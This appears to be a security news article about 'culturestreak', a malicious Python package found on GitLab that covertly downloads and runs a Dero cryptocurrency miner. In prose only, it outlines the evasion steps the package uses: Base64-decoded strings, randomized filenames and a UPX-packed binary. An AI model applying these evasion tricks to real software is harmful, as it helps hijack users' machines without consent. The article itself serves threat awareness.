A recent discovery by security researchers has revealed yet another example of a malicious open source package being used to hijack system resources for cryptocurrency mining. The package, named “culturestreak,” was found in an active repository on the GitLab developer site and originates from a user named Aldri Terakhir.
If downloaded and deployed, “culturestreak” runs in a continuous loop that exploits system resources to mine Dero cryptocurrency as part of a larger cryptomining operation. This unauthorized mining operation poses significant risks as it slows down computers, exploits system resources, and potentially exposes users to further risks.
The discovery of this malicious package highlights the ongoing supply chain threat posed by opportunistic threat actors who inject malicious code into open source packages used by developers to build software. This tactic allows them to reach as many victims as possible with minimal effort. To combat this, Checkmarx, a cybersecurity company, has even launched a threat intelligence API to identify malicious packages before they enter the software supply chain.
Python packages have become a popular choice for hiding malicious payloads due to the widespread use of the open source software platform for building software. Python developers often share code packages online via repositories like GitLab and GitHub, making it an easily accessible ecosystem for threat actors to exploit. In a separate malicious campaign, threat actors targeted users of the Python Package Index (PyPI) in a social engineering attack aimed at stealing credentials and loading compromised packages onto the repository itself.
Upon deployment, culturestreak employs various obfuscation techniques to evade detection. It decodes several Base64-encoded strings, which are then used in subsequent steps of the operation. The package also sets the filename for the downloaded malicious binary to a random integer to hinder detection based on fixed naming conventions. After downloading a binary file called “bwt2,” the researchers discovered it had been packed using the UPX executable packer. Once unpacked, they found a known tool for mining Dero crypto called “astrominer 1.9.2 R4.”
The unpacked binary runs in an infinite loop, using hardcoded pool URLs and wallet addresses to exploit system resources for unauthorized cryptocurrency mining. This means that the package turns users’ computers into a cog in a larger mining operation without their consent. The discovery of this malicious code package emphasizes the importance of developers vetting code and packages from verified sources and staying informed about potential threats to their software development.
Checkmarx has provided a list of indicators of compromise (IoCs) to help users identify if the culturestreak malicious code package is running on their system. These IoCs can aid in detecting and mitigating the risks associated with this malicious package. As the threat landscape continues to evolve, it is crucial for both developers and users to remain vigilant and proactive in their cybersecurity practices to protect against such threats.